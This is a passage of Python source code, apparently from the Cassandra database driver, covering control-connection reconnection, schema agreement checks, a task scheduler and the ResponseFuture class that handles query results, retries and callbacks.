self_weakref = weakref.ref(self, partial(_clear_watcher, weakref.proxy(connection)))
try:
connection.register_watchers({
"TOPOLOGY_CHANGE": partial(_watch_callback, self_weakref, '_handle_topology_change'),
"STATUS_CHANGE": partial(_watch_callback, self_weakref, '_handle_status_change'),
"SCHEMA_CHANGE": partial(_watch_callback, self_weakref, '_handle_schema_change')
}, register_timeout=self._timeout)
sel_peers = self._SELECT_PEERS if self._token_meta_enabled else self._SELECT_PEERS_NO_TOKENS
sel_local = self._SELECT_LOCAL if self._token_meta_enabled else self._SELECT_LOCAL_NO_TOKENS
peers_query = QueryMessage(query=sel_peers, consistency_level=ConsistencyLevel.ONE)
local_query = QueryMessage(query=sel_local, consistency_level=ConsistencyLevel.ONE)
shared_results = connection.wait_for_responses(
peers_query, local_query, timeout=self._timeout)
self._refresh_node_list_and_token_map(connection, preloaded_results=shared_results)
self._refresh_schema(connection, preloaded_results=shared_results, schema_agreement_wait=-1)
except Exception:
connection.close()
raise
return connection
def reconnect(self):
if self._is_shutdown:
return
self._submit(self._reconnect)
def _reconnect(self):
log.debug("[control connection] Attempting to reconnect")
try:
self._set_new_connection(self._reconnect_internal())
except NoHostAvailable:
# make a retry schedule (which includes backoff)
            schedule = self._cluster.reconnection_policy.new_schedule()
with self._reconnection_lock:
# cancel existing reconnection attempts
if self._reconnection_handler:
self._reconnection_handler.cancel()
# when a connection is successfully made, _set_new_connection
# will be called with the new connection and then our
# _reconnection_handler will be cleared out
self._reconnection_handler = _ControlReconnectionHandler(
self, self._cluster.scheduler, schedule,
self._get_and_set_reconnection_handler,
new_handler=None)
self._reconnection_handler.start()
except Exception:
log.debug("[control connection] error reconnecting", exc_info=True)
raise
def _get_and_set_reconnection_handler(self, new_handler):
"""
Called by the _ControlReconnectionHandler when a new connection
is successfully created. Clears out the _reconnection_handler on
this ControlConnection.
"""
with self._reconnection_lock:
old = self._reconnection_handler
self._reconnection_handler = new_handler
return old
def _submit(self, *args, **kwargs):
try:
if not self._cluster.is_shutdown:
return self._cluster.executor.submit(*args, **kwargs)
except ReferenceError:
pass
return None
def shutdown(self):
# stop trying to reconnect (if we are)
with self._reconnection_lock:
if self._reconnection_handler:
self._reconnection_handler.cancel()
with self._lock:
if self._is_shutdown:
return
else:
self._is_shutdown = True
log.debug("Shutting down control connection")
if self._connection:
self._connection.close()
self._connection = None
def refresh_schema(self, force=False, **kwargs):
try:
if self._connection:
return self._refresh_schema(self._connection, force=force, **kwargs)
except ReferenceError:
pass # our weak reference to the Cluster is no good
except Exception:
log.debug("[control connection] Error refreshing schema", exc_info=True)
self._signal_error()
return False
def _refresh_schema(self, connection, preloaded_results=None, schema_agreement_wait=None, force=False, **kwargs):
if self._cluster.is_shutdown:
return False
agreed = self.wait_for_schema_agreement(connection,
preloaded_results=preloaded_results,
wait_time=schema_agreement_wait)
if not self._schema_meta_enabled and not force:
log.debug("[control connection] Skipping schema refresh because schema metadata is disabled")
return False
if not agreed:
log.debug("Skipping schema refresh due to lack of schema agreement")
return False
self._cluster.metadata.refresh(connection, self._timeout, **kwargs)
return True
def refresh_node_list_and_token_map(self, force_token_rebuild=False):
try:
if self._connection:
self._refresh_node_list_and_token_map(self._connection, force_token_rebuild=force_token_rebuild)
return True
except ReferenceError:
pass # our weak reference to the Cluster is no good
except Exception:
log.debug("[control connection] Error refreshing node list and token map", exc_info=True)
self._signal_error()
return False
def _refresh_node_list_and_token_map(self, connection, preloaded_results=None,
force_token_rebuild=False):
if preloaded_results:
log.debug("[control connection] Refreshing node list and token map using preloaded results")
peers_result = preloaded_results[0]
local_result = preloaded_results[1]
else:
cl = ConsistencyLevel.ONE
if not self._token_meta_enabled:
log.debug("[control connection] Refreshing node list without token map")
sel_peers = self._SELECT_PEERS_NO_TOKENS
sel_local = self._SELECT_LOCAL_NO_TOKENS
else:
log.debug("[control connection] Refreshing node list and token map")
sel_peers = self._SELECT_PEERS
sel_local = self._SELECT_LOCAL
peers_query = QueryMessage(query=sel_peers, consistency_level=cl)
local_query = QueryMessage(query=sel_local, consistency_level=cl)
peers_result, local_result = connection.wait_for_responses(
peers_query, local_query, timeout=self._timeout)
peers_result = dict_factory(*peers_result.results)
partitioner = None
token_map = {}
found_hosts = set()
if local_result.results:
found_hosts.add(connection.host)
local_rows = dict_factory(*(local_result.results))
local_row = local_rows[0]
cluster_name = local_row["cluster_name"]
self._cluster.metadata.cluster_name = cluster_name
partitioner = local_row.get("partitioner")
tokens = local_row.get("tokens")
host = self._cluster.metadata.get_host(connection.host)
if host:
datacenter = local_row.get("data_center")
rack = local_row.get("rack")
self._update_location_info(host, datacenter, rack)
host.listen_address = local_row.get("listen_address")
host.broadcast_address = local_row.get("broadcast_address")
host.release_version = local_row.get("release_version")
host.dse_version = local_row.get("dse_version")
host.dse_workload = local_row.get("workload")
if partitioner and tokens:
token_map[host] = tokens
# Check metadata.partitioner to see if we haven't built anything yet. If
# every node in the cluster was in the contact points, we won't discover
# any new nodes, so we need this additional check. (See PYTHON-90)
should_rebuild_token_map = force_token_rebuild or self._cluster.metadata.partitioner is None
for row in peers_result:
addr = self._rpc_from_peer_row(row)
tokens = row.get("tokens", None)
if 'tokens' in row and not tokens: # it was selected, but empty
log.warning("Excluding host (%s) with no tokens in system.peers table of %s." % (addr, connection.host))
continue
if addr in found_hosts:
log.warning("Found multiple hosts with the same rpc_address (%s). Excluding peer %s", addr, row.get("peer"))
continue
found_hosts.add(addr)
host = self._cluster.metadata.get_host(addr)
datacenter = row.get("data_center")
rack = row.get("rack")
if host is None:
log.debug("[control connection] Found new host to connect to: %s", addr)
host, _ = self._cluster.add_host(addr, datacenter, rack, signal=True, refresh_nodes=False)
should_rebuild_token_map = True
else:
should_rebuild_token_map |= self._update_location_info(host, datacenter, rack)
host.broadcast_address = row.get("peer")
host.release_version = row.get("release_version")
host.dse_version = row.get("dse_version")
host.dse_workload = row.get("workload")
if partitioner and tokens:
token_map[host] = tokens
for old_host in self._cluster.metadata.all_hosts():
if old_host.address != connection.host and old_host.address not in found_hosts:
should_rebuild_token_map = True
if old_host.address not in self._cluster.contact_points:
log.debug("[control connection] Removing host not found in peers metadata: %r", old_host)
self._cluster.remove_host(old_host)
log.debug("[control connection] Finished fetching ring info")
if partitioner and should_rebuild_token_map:
log.debug("[control connection] Rebuilding token map due to topology changes")
self._cluster.metadata.rebuild_token_map(partitioner, token_map)
def _update_location_info(self, host, datacenter, rack):
if host.datacenter == datacenter and host.rack == rack:
return False
# If the dc/rack information changes, we need to update the load balancing policy.
# For that, we remove and re-add the node against the policy. Not the most elegant, and assumes
# that the policy will update correctly, but in practice this should work.
self._cluster.load_balancing_policy.on_down(host)
host.set_location_info(datacenter, rack)
self._cluster.load_balancing_policy.on_up(host)
return True
def _delay_for_event_type(self, event_type, delay_window):
        # this serves to order the processing of correlated events (received within the window);
        # the window and randomization still have the desired effect of skewing refreshes across client instances
next_time = self._event_schedule_times.get(event_type, 0)
now = self._time.time()
if now <= next_time:
this_time = next_time + 0.01
delay = this_time - now
else:
delay = random() * delay_window
this_time = now + delay
self._event_schedule_times[event_type] = this_time
return delay
def _refresh_nodes_if_not_up(self, addr):
"""
Used to mitigate refreshes for nodes that are already known.
Some versions of the server send superfluous NEW_NODE messages in addition to UP events.
"""
host = self._cluster.metadata.get_host(addr)
if not host or not host.is_up:
self.refresh_node_list_and_token_map()
def _handle_topology_change(self, event):
change_type = event["change_type"]
addr = self._translate_address(event["address"][0])
if change_type == "NEW_NODE" or change_type == "MOVED_NODE":
if self._topology_event_refresh_window >= 0:
delay = self._delay_for_event_type('topology_change', self._topology_event_refresh_window)
self._cluster.scheduler.schedule_unique(delay, self._refresh_nodes_if_not_up, addr)
elif change_type == "REMOVED_NODE":
host = self._cluster.metadata.get_host(addr)
self._cluster.scheduler.schedule_unique(0, self._cluster.remove_host, host)
def _handle_status_change(self, event):
change_type = event["change_type"]
addr = self._translate_address(event["address"][0])
host = self._cluster.metadata.get_host(addr)
if change_type == "UP":
delay = self._delay_for_event_type('status_change', self._status_event_refresh_window)
if host is None:
# this is the first time we've seen the node
self._cluster.scheduler.schedule_unique(delay, self.refresh_node_list_and_token_map)
else:
self._cluster.scheduler.schedule_unique(delay, self._cluster.on_up, host)
elif change_type == "DOWN":
            # Note that there is a slight risk we can receive the event late and thus
            # mark the host down even though we have already reconnected successfully.
            # But that is unlikely and has little consequence, since we will try
            # reconnecting right away; we favor the detection to keep Host.is_up more accurate.
if host is not None:
# this will be run by the scheduler
self._cluster.on_down(host, is_host_addition=False)
def _translate_address(self, addr):
return self._cluster.address_translator.translate(addr)
def _handle_schema_change(self, event):
if self._schema_event_refresh_window < 0:
return
delay = self._delay_for_event_type('schema_change', self._schema_event_refresh_window)
self._cluster.scheduler.schedule_unique(delay, self.refresh_schema, **event)
def wait_for_schema_agreement(self, connection=None, preloaded_results=None, wait_time=None):
total_timeout = wait_time if wait_time is not None else self._cluster.max_schema_agreement_wait
if total_timeout <= 0:
return True
# Each schema change typically generates two schema refreshes, one
# from the response type and one from the pushed notification. Holding
# a lock is just a simple way to cut down on the number of schema queries
# we'll make.
with self._schema_agreement_lock:
if self._is_shutdown:
return
if not connection:
connection = self._connection
if preloaded_results:
log.debug("[control connection] Attempting to use preloaded results for schema agreement")
peers_result = preloaded_results[0]
local_result = preloaded_results[1]
schema_mismatches = self._get_schema_mismatches(peers_result, local_result, connection.host)
if schema_mismatches is None:
return True
log.debug("[control connection] Waiting for schema agreement")
start = self._time.time()
elapsed = 0
cl = ConsistencyLevel.ONE
schema_mismatches = None
while elapsed < total_timeout:
peers_query = QueryMessage(query=self._SELECT_SCHEMA_PEERS, consistency_level=cl)
local_query = QueryMessage(query=self._SELECT_SCHEMA_LOCAL, consistency_level=cl)
try:
timeout = min(self._timeout, total_timeout - elapsed)
peers_result, local_result = connection.wait_for_responses(
peers_query, local_query, timeout=timeout)
except OperationTimedOut as timeout:
log.debug("[control connection] Timed out waiting for "
"response during schema agreement check: %s", timeout)
elapsed = self._time.time() - start
continue
except ConnectionShutdown:
if self._is_shutdown:
log.debug("[control connection] Aborting wait for schema match due to shutdown")
return None
else:
raise
schema_mismatches = self._get_schema_mismatches(peers_result, local_result, connection.host)
if schema_mismatches is None:
return True
log.debug("[control connection] Schemas mismatched, trying again")
self._time.sleep(0.2)
elapsed = self._time.time() - start
log.warning("Node %s is reporting a schema disagreement: %s",
connection.host, schema_mismatches)
return False
def _get_schema_mismatches(self, peers_result, local_result, local_address):
peers_result = dict_factory(*peers_result.results)
versions = defaultdict(set)
if local_result.results:
local_row = dict_factory(*local_result.results)[0]
if local_row.get("schema_version"):
versions[local_row.get("schema_version")].add(local_address)
lbp = self._cluster.load_balancing_policy
for row in peers_result:
schema_ver = row.get('schema_version')
if not schema_ver:
continue
addr = self._rpc_from_peer_row(row)
peer = self._cluster.metadata.get_host(addr)
if peer and peer.is_up and lbp.distance(peer) != HostDistance.IGNORED:
versions[schema_ver].add(addr)
if len(versions) == 1:
log.debug("[control connection] Schemas match")
return None
return dict((version, list(nodes)) for version, nodes in six.iteritems(versions))
def _rpc_from_peer_row(self, row):
addr = row.get("rpc_address")
if not addr or addr in ["0.0.0.0", "::"]:
addr = row.get("peer")
return self._translate_address(addr)
def _signal_error(self):
with self._lock:
if self._is_shutdown:
return
# try just signaling the cluster, as this will trigger a reconnect
# as part of marking the host down
if self._connection and self._connection.is_defunct:
host = self._cluster.metadata.get_host(self._connection.host)
# host may be None if it's already been removed, but that indicates
# that errors have already been reported, so we're fine
if host:
self._cluster.signal_connection_failure(
host, self._connection.last_error, is_host_addition=False)
return
# if the connection is not defunct or the host already left, reconnect
# manually
self.reconnect()
def on_up(self, host):
pass
def on_down(self, host):
conn = self._connection
if conn and conn.host == host.address and \
self._reconnection_handler is None:
log.debug("[control connection] Control connection host (%s) is "
"considered down, starting reconnection", host)
# this will result in a task being submitted to the executor to reconnect
self.reconnect()
def on_add(self, host, refresh_nodes=True):
if refresh_nodes:
self.refresh_node_list_and_token_map(force_token_rebuild=True)
def on_remove(self, host):
c = self._connection
if c and c.host == host.address:
log.debug("[control connection] Control connection host (%s) is being removed. Reconnecting", host)
# refresh will be done on reconnect
self.reconnect()
else:
self.refresh_node_list_and_token_map(force_token_rebuild=True)
def get_connections(self):
c = getattr(self, '_connection', None)
return [c] if c else []
def return_connection(self, connection):
if connection is self._connection and (connection.is_defunct or connection.is_closed):
self.reconnect()
def _stop_scheduler(scheduler, thread):
try:
if not scheduler.is_shutdown:
scheduler.shutdown()
except ReferenceError:
pass
thread.join()
class _Scheduler(Thread):
_queue = None
_scheduled_tasks = None
_executor = None
is_shutdown = False
def __init__(self, executor):
self._queue = Queue.PriorityQueue()
self._scheduled_tasks = set()
self._count = count()
self._executor = executor
Thread.__init__(self, name="Task Scheduler")
self.daemon = True
self.start()
def shutdown(self):
try:
log.debug("Shutting down Cluster Scheduler")
except AttributeError:
# this can happen on interpreter shutdown
pass
self.is_shutdown = True
self._queue.put_nowait((0, 0, None))
self.join()
def schedule(self, delay, fn, *args, **kwargs):
self._insert_task(delay, (fn, args, tuple(kwargs.items())))
def schedule_unique(self, delay, fn, *args, **kwargs):
task = (fn, args, tuple(kwargs.items()))
if task not in self._scheduled_tasks:
self._insert_task(delay, task)
else:
log.debug("Ignoring schedule_unique for already-scheduled task: %r", task)
def _insert_task(self, delay, task):
if not self.is_shutdown:
run_at = time.time() + delay
self._scheduled_tasks.add(task)
self._queue.put_nowait((run_at, next(self._count), task))
else:
log.debug("Ignoring scheduled task after shutdown: %r", task)
def run(self):
while True:
if self.is_shutdown:
return
try:
while True:
run_at, i, task = self._queue.get(block=True, timeout=None)
if self.is_shutdown:
if task:
log.debug("Not executing scheduled task due to Scheduler shutdown")
return
if run_at <= time.time():
self._scheduled_tasks.discard(task)
fn, args, kwargs = task
kwargs = dict(kwargs)
future = self._executor.submit(fn, *args, **kwargs)
future.add_done_callback(self._log_if_failed)
else:
self._queue.put_nowait((run_at, i, task))
break
except Queue.Empty:
pass
time.sleep(0.1)
def _log_if_failed(self, future):
exc = future.exception()
if exc:
log.warning(
"An internally scheduled tasked failed with an unhandled exception:",
exc_info=exc)
def refresh_schema_and_set_result(control_conn, response_future, **kwargs):
try:
log.debug("Refreshing schema in response to schema change. "
"%s", kwargs)
response_future.is_schema_agreed = control_conn._refresh_schema(response_future._connection, **kwargs)
except Exception:
log.exception("Exception refreshing schema in response to schema change:")
response_future.session.submit(control_conn.refresh_schema, **kwargs)
finally:
response_future._set_final_result(None)
class ResponseFuture(object):
"""
An asynchronous response delivery mechanism that is returned from calls
to :meth:`.Session.execute_async()`.
There are two ways for results to be delivered:
- Synchronously, by calling :meth:`.result()`
- Asynchronously, by attaching callback and errback functions via
:meth:`.add_callback()`, :meth:`.add_errback()`, and
:meth:`.add_callbacks()`.
"""
query = None
"""
The :class:`~.Statement` instance that is being executed through this
:class:`.ResponseFuture`.
"""
is_schema_agreed = True
"""
    For DDL requests, this may be set to ``False`` if the schema agreement poll after the response fails.
Always ``True`` for non-DDL requests.
"""
session = None
row_factory = None
message = None
default_timeout = None
_req_id = None
_final_result = _NOT_SET
_col_names = None
_final_exception = None
_query_traces = None
_callbacks = None
_errbacks = None
_current_host = None
_current_pool = None
_connection = None
_query_retries = 0
_start_time = None
_metrics = None
_paging_state = None
_custom_payload = None
_warnings = None
_timer = None
_protocol_handler = ProtocolHandler
_warned_timeout = False
def __init__(self, session, message, query, timeout, metrics=None, prepared_statement=None):
self.session = session
self.row_factory = session.row_factory
self.message = message
self.query = query
self.timeout = timeout
self._metrics = metrics
self.prepared_statement = prepared_statement
self._callback_lock = Lock()
if metrics is not None:
self._start_time = time.time()
self._make_query_plan()
self._event = Event()
self._errors = {}
self._callbacks = []
self._errbacks = []
def _start_timer(self):
if self.timeout is not None:
self._timer = self.session.cluster.connection_class.create_timer(self.timeout, self._on_timeout)
def _cancel_timer(self):
if self._timer:
self._timer.cancel()
def _on_timeout(self):
errors = self._errors
if not errors:
if self.is_schema_agreed:
errors = {self._current_host.address: "Client request timeout. See Session.execute[_async](timeout)"}
else:
connection = getattr(self.session.cluster.control_connection, '_connection')
host = connection.host if connection else 'unknown'
errors = {host: "Request timed out while waiting for schema agreement. See Session.execute[_async](timeout) and Cluster.max_schema_agreement_wait."}
self._set_final_exception(OperationTimedOut(errors, self._current_host))
def _make_query_plan(self):
# convert the list/generator/etc to an iterator so that subsequent
# calls to send_request (which retries may do) will resume where
# they last left off
self.query_plan = iter(self.session._load_balancer.make_query_plan(
self.session.keyspace, self.query))
def send_request(self):
""" Internal """
# query_plan is an iterator, so this will resume where we last left
# off if send_request() is called multiple times
start = time.time()
for host in self.query_plan:
req_id = self._query(host)
if req_id is not None:
self._req_id = req_id
# timer is only started here, after we have at least one message queued
# this is done to avoid overrun of timers with unfettered client requests
# in the case of full disconnect, where no hosts will be available
if self._timer is None:
self._start_timer()
return
if self.timeout is not None and time.time() - start > self.timeout:
self._on_timeout()
return
self._set_final_exception(NoHostAvailable(
"Unable to complete the operation against any hosts", self._errors))
def _query(self, host, message=None, cb=None):
if message is None:
message = self.message
if cb is None:
cb = self._set_result
pool = self.session._pools.get(host)
if not pool:
self._errors[host] = ConnectionException("Host has been marked down or removed")
return None
elif pool.is_shutdown:
self._errors[host] = ConnectionException("Pool is shutdown")
return None
self._current_host = host
self._current_pool = pool
connection = None
try:
# TODO get connectTimeout from cluster settings
connection, request_id = pool.borrow_connection(timeout=2.0)
self._connection = connection
connection.send_msg(message, request_id, cb=cb, encoder=self._protocol_handler.encode_message, decoder=self._protocol_handler.decode_message)
return request_id
except NoConnectionsAvailable as exc:
log.debug("All connections for host %s are at capacity, moving to the next host", host)
self._errors[host] = exc
return None
except Exception as exc:
log.debug("Error querying host %s", host, exc_info=True)
self._errors[host] = exc
if self._metrics is not None:
self._metrics.on_connection_error()
if connection:
pool.return_connection(connection)
return None
@property
def has_more_pages(self):
"""
Returns :const:`True` if there are more pages left in the
query results, :const:`False` otherwise. This should only
be checked after the first page has been returned.
.. versionadded:: 2.0.0
"""
return self._paging_state is not None
@property
def warnings(self):
"""
Warnings returned from the server, if any. This will only be
set for protocol_version 4+.
Warnings may be returned for such things as oversized batches,
or too many tombstones in slice queries.
Ensure the future is complete before trying to access this property
        (call :meth:`.result()`, or wait until a callback is invoked);
        otherwise a :exc:`.DriverException` is raised because the response has not been received.
"""
# TODO: When timers are introduced, just make this wait
if not self._event.is_set():
raise DriverException("warnings cannot be retrieved before ResponseFuture is finalized")
return self._warnings
@property
def custom_payload(self):
"""
The custom payload returned from the server, if any. This will only be
set by Cassandra servers implementing a custom QueryHandler, and only
for protocol_version 4+.
Ensure the future is complete before trying to access this property
        (call :meth:`.result()`, or wait until a callback is invoked);
        otherwise a :exc:`.DriverException` is raised because the response has not been received.
:return: :ref:`custom_payload`.
"""
# TODO: When timers are introduced, just make this wait
if not self._event.is_set():
raise DriverException("custom_payload cannot be retrieved before ResponseFuture is finalized")
return self._custom_payload
def start_fetching_next_page(self):
"""
If there are more pages left in the query result, this asynchronously
starts fetching the next page. If there are no pages left, :exc:`.QueryExhausted`
is raised. Also see :attr:`.has_more_pages`.
This should only be called after the first page has been returned.
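        A hedged sketch of callback-driven paging (``handle_page``, ``handle_error``,
        and ``process_row`` are hypothetical)::
            >>> def handle_page(rows):
            ...     for row in rows:
            ...         process_row(row)
            ...     if future.has_more_pages:
            ...         future.start_fetching_next_page()
            >>> future = session.execute_async("SELECT * FROM users")
            >>> future.add_callbacks(handle_page, handle_error)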
.. versionadded:: 2.0.0
"""
if not self._paging_state:
raise QueryExhausted()
self._make_query_plan()
self.message.paging_state = self._paging_state
self._event.clear()
self._final_result = _NOT_SET
self._final_exception = None
self._timer = None # clear cancelled timer; new one will be set when request is queued
self.send_request()
def _reprepare(self, prepare_message):
cb = partial(self.session.submit, self._execute_after_prepare)
request_id = self._query(self._current_host, prepare_message, cb=cb)
if request_id is None:
# try to submit the original prepared statement on some other host
self.send_request()
def _set_result(self, response):
try:
if self._current_pool and self._connection:
self._current_pool.return_connection(self._connection)
trace_id = getattr(response, 'trace_id', None)
if trace_id:
if not self._query_traces:
self._query_traces = []
self._query_traces.append(QueryTrace(trace_id, self.session))
self._warnings = getattr(response, 'warnings', None)
self._custom_payload = getattr(response, 'custom_payload', None)
if isinstance(response, ResultMessage):
if response.kind == RESULT_KIND_SET_KEYSPACE:
session = getattr(self, 'session', None)
# since we're running on the event loop thread, we need to
# use a non-blocking method for setting the keyspace on
# all connections in this session, otherwise the event
# loop thread will deadlock waiting for keyspaces to be
# set. This uses a callback chain which ends with
# self._set_keyspace_completed() being called in the
# event loop thread.
if session:
session._set_keyspace_for_all_pools(
response.results, self._set_keyspace_completed)
elif response.kind == RESULT_KIND_SCHEMA_CHANGE:
# refresh the schema before responding, but do it in another
# thread instead of the event loop thread
self.is_schema_agreed = False
self.session.submit(
refresh_schema_and_set_result,
self.session.cluster.control_connection,
self, **response.results)
else:
results = getattr(response, 'results', None)
if results is not None and response.kind == RESULT_KIND_ROWS:
self._paging_state = response.paging_state
self._col_names = results[0]
results = self.row_factory(*results)
self._set_final_result(results)
elif isinstance(response, ErrorMessage):
retry_policy = None
if self.query:
retry_policy = self.query.retry_policy
if not retry_policy:
retry_policy = self.session.cluster.default_retry_policy
if isinstance(response, ReadTimeoutErrorMessage):
if self._metrics is not None:
self._metrics.on_read_timeout()
retry = retry_policy.on_read_timeout(
self.query, retry_num=self._query_retries, **response.info)
elif isinstance(response, WriteTimeoutErrorMessage):
if self._metrics is not None:
self._metrics.on_write_timeout()
retry = retry_policy.on_write_timeout(
self.query, retry_num=self._query_retries, **response.info)
elif isinstance(response, UnavailableErrorMessage):
if self._metrics is not None:
self._metrics.on_unavailable()
retry = retry_policy.on_unavailable(
self.query, retry_num=self._query_retries, **response.info)
elif isinstance(response, OverloadedErrorMessage):
if self._metrics is not None:
self._metrics.on_other_error()
# need to retry against a different host here
log.warning("Host %s is overloaded, retrying against a different "
"host", self._current_host)
self._retry(reuse_connection=False, consistency_level=None)
return
elif isinstance(response, IsBootstrappingErrorMessage):
if self._metrics is not None:
self._metrics.on_other_error()
# need to retry against a different host here
self._retry(reuse_connection=False, consistency_level=None)
return
elif isinstance(response, PreparedQueryNotFound):
if self.prepared_statement:
query_id = self.prepared_statement.query_id
assert query_id == response.info, \
"Got different query ID in server response (%s) than we " \
"had before (%s)" % (response.info, query_id)
else:
query_id = response.info
try:
prepared_statement = self.session.cluster._prepared_statements[query_id]
except KeyError:
if not self.prepared_statement:
log.error("Tried to execute unknown prepared statement: id=%s",
query_id.encode('hex'))
self._set_final_exception(response)
return
else:
prepared_statement = self.prepared_statement
self.session.cluster._prepared_statements[query_id] = prepared_statement
current_keyspace = self._connection.keyspace
prepared_keyspace = prepared_statement.keyspace
if prepared_keyspace and current_keyspace != prepared_keyspace:
self._set_final_exception(
ValueError("The Session's current keyspace (%s) does "
"not match the keyspace the statement was "
"prepared with (%s)" %
(current_keyspace, prepared_keyspace)))
return
log.debug("Re-preparing unrecognized prepared statement against host %s: %s",
self._current_host, prepared_statement.query_string)
prepare_message = PrepareMessage(query=prepared_statement.query_string)
# since this might block, run on the executor to avoid hanging
# the event loop thread
self.session.submit(self._reprepare, prepare_message)
return
else:
if hasattr(response, 'to_exception'):
self._set_final_exception(response.to_exception())
else:
self._set_final_exception(response)
return
retry_type, consistency = retry
if retry_type in (RetryPolicy.RETRY, RetryPolicy.RETRY_NEXT_HOST):
self._query_retries += 1
reuse = retry_type == RetryPolicy.RETRY
self._retry(reuse_connection=reuse, consistency_level=consistency)
elif retry_type is RetryPolicy.RETHROW:
self._set_final_exception(response.to_exception())
else: # IGNORE
if self._metrics is not None:
self._metrics.on_ignore()
self._set_final_result(None)
self._errors[self._current_host] = response.to_exception()
elif isinstance(response, ConnectionException):
if self._metrics is not None:
self._metrics.on_connection_error()
if not isinstance(response, ConnectionShutdown):
self._connection.defunct(response)
self._retry(reuse_connection=False, consistency_level=None)
elif isinstance(response, Exception):
if hasattr(response, 'to_exception'):
self._set_final_exception(response.to_exception())
else:
self._set_final_exception(response)
else:
# we got some other kind of response message
msg = "Got unexpected message: %r" % (response,)
exc = ConnectionException(msg, self._current_host)
self._connection.defunct(exc)
self._set_final_exception(exc)
except Exception as exc:
# almost certainly caused by a bug, but we need to set something here
log.exception("Unexpected exception while handling result in ResponseFuture:")
self._set_final_exception(exc)
def _set_keyspace_completed(self, errors):
if not errors:
self._set_final_result(None)
else:
self._set_final_exception(ConnectionException(
"Failed to set keyspace on all hosts: %s" % (errors,)))
def _execute_after_prepare(self, response):
"""
Handle the response to our attempt to prepare a statement.
If it succeeded, run the original query again against the same host.
"""
if self._current_pool and self._connection:
self._current_pool.return_connection(self._connection)
if self._final_exception:
return
if isinstance(response, ResultMessage):
if response.kind == RESULT_KIND_PREPARED:
# use self._query to re-use the same host and
# at the same time properly borrow the connection
request_id = self._query(self._current_host)
if request_id is None:
# this host errored out, move on to the next
self.send_request()
else:
self._set_final_exception(ConnectionException(
"Got unexpected response when preparing statement "
"on host %s: %s" % (self._current_host, response)))
elif isinstance(response, ErrorMessage):
if hasattr(response, 'to_exception'):
self._set_final_exception(response.to_exception())
else:
self._set_final_exception(response)
elif isinstance(response, ConnectionException):
log.debug("Connection error when preparing statement on host %s: %s",
self._current_host, response)
# try again on a different host, preparing again if necessary
self._errors[self._current_host] = response
self.send_request()
else:
self._set_final_exception(ConnectionException(
"Got unexpected response type when preparing "
"statement on host %s: %s" % (self._current_host, response)))
def _set_final_result(self, response):
self._cancel_timer()
if self._metrics is not None:
self._metrics.request_timer.addValue(time.time() - self._start_time)
with self._callback_lock:
self._final_result = response
self._event.set()
# apply each callback
for callback in self._callbacks:
fn, args, kwargs = callback
fn(response, *args, **kwargs)
def _set_final_exception(self, response):
self._cancel_timer()
if self._metrics is not None:
self._metrics.request_timer.addValue(time.time() - self._start_time)
with self._callback_lock:
self._final_exception = response
self._event.set()
for errback in self._errbacks:
fn, args, kwargs = errback
fn(response, *args, **kwargs)
def _retry(self, reuse_connection, consistency_level):
if self._final_exception:
# the connection probably broke while we were waiting
# to retry the operation
return
if self._metrics is not None:
self._metrics.on_retry()
if consistency_level is not None:
self.message.consistency_level = consistency_level
# don't retry on the event loop thread
self.session.submit(self._retry_task, reuse_connection)
def _retry_task(self, reuse_connection):
if self._final_exception:
# the connection probably broke while we were waiting
# to retry the operation
return
if reuse_connection and self._query(self._current_host) is not None:
return
# otherwise, move onto another host
self.send_request()
def result(self):
"""
Return the final result or raise an Exception if errors were
encountered. If the final result or error has not been set
yet, this method will block until it is set, or the timeout
set for the request expires.
Timeout is specified in the Session request execution functions.
If the timeout is exceeded, an :exc:`cassandra.OperationTimedOut` will be raised.
This is a client-side timeout. For more information
about server-side coordinator timeouts, see :class:`.policies.RetryPolicy`.
Example usage::
>>> future = session.execute_async("SELECT * FROM mycf")
>>> # do other stuff...
>>> try:
... rows = future.result()
... for row in rows:
... ... # process results
... except Exception:
... log.exception("Operation failed:")
"""
self._event.wait()
if self._final_result is not _NOT_SET:
return ResultSet(self, self._final_result)
else:
raise self._final_exception
def get_query_trace_ids(self):
"""
Returns the trace session ids for this future, if tracing was enabled (does not fetch trace data).
"""
return [trace.trace_id for trace in self._query_traces]
def get_query_trace(self, max_wait=None, query_cl=ConsistencyLevel.LOCAL_ONE):
"""
Fetches and returns the query trace of the last response, or `None` if tracing was
not enabled.
Note that this may raise an exception if there are problems retrieving the trace
details from Cassandra. If the trace is not available after `max_wait`,
:exc:`cassandra.query.TraceUnavailable` will be raised.
`query_cl` is the consistency level used to poll the trace tables.
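        A minimal sketch (the ``trace`` keyword on the execute call is an assumption;
        tracing must have been requested for the query)::
            >>> future = session.execute_async("SELECT * FROM users", trace=True)
            >>> rows = future.result()
            >>> query_trace = future.get_query_trace(max_wait=2.0)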
"""
if self._query_traces:
return self._get_query_trace(len(self._query_traces) - 1, max_wait, query_cl)
def get_all_query_traces(self, max_wait_per=None, query_cl=ConsistencyLevel.LOCAL_ONE):
"""
Fetches and returns the query traces for all query pages, if tracing was enabled.
See note in :meth:`~.get_query_trace` regarding possible exceptions.
"""
if self._query_traces:
return [self._get_query_trace(i, max_wait_per, query_cl) for i in range(len(self._query_traces))]
return []
def _get_query_trace(self, i, max_wait, query_cl):
trace = self._query_traces[i]
if not trace.events:
trace.populate(max_wait=max_wait, query_cl=query_cl)
return trace
def add_callback(self, fn, *args, **kwargs):
"""
Attaches a callback function to be called when the final results arrive.
By default, `fn` will be called with the results as the first and only
argument. If `*args` or `**kwargs` are supplied, they will be passed
through as additional positional or keyword arguments to `fn`.
If an error is hit while executing the operation, a callback attached
here will not be called. Use :meth:`.add_errback()` or :meth:`add_callbacks()`
if you wish to handle that case.
If the final result has already been seen when this method is called,
the callback will be called immediately (before this method returns).
Note: in the case that the result is not available when the callback is added,
        the callback is executed by the IO event thread. This means that the callback
should not block or attempt further synchronous requests, because no further
IO will be processed until the callback returns.
**Important**: if the callback you attach results in an exception being
raised, **the exception will be ignored**, so please ensure your
callback handles all error cases that you care about.
Usage example::
>>> session = cluster.connect("mykeyspace")
>>> def handle_results(rows, start_time, should_log=False):
... if should_log:
... log.info("Total time: %f", time.time() - start_time)
... ...
>>> future = session.execute_async("SELECT * FROM users")
>>> future.add_callback(handle_results, time.time(), should_log=True)
"""
run_now = False
with self._callback_lock:
if self._final_result is not _NOT_SET:
run_now = True
else:
self._callbacks.append((fn, args, kwargs))
if run_now:
fn(self._final_result, *args, **kwargs)
return self
def add_errback(self, fn, *args, **kwargs):
"""
Like :meth:`.add_callback()`, but handles error cases.
An Exception instance will be passed as the first positional argument
to `fn`.
"""
run_now = False
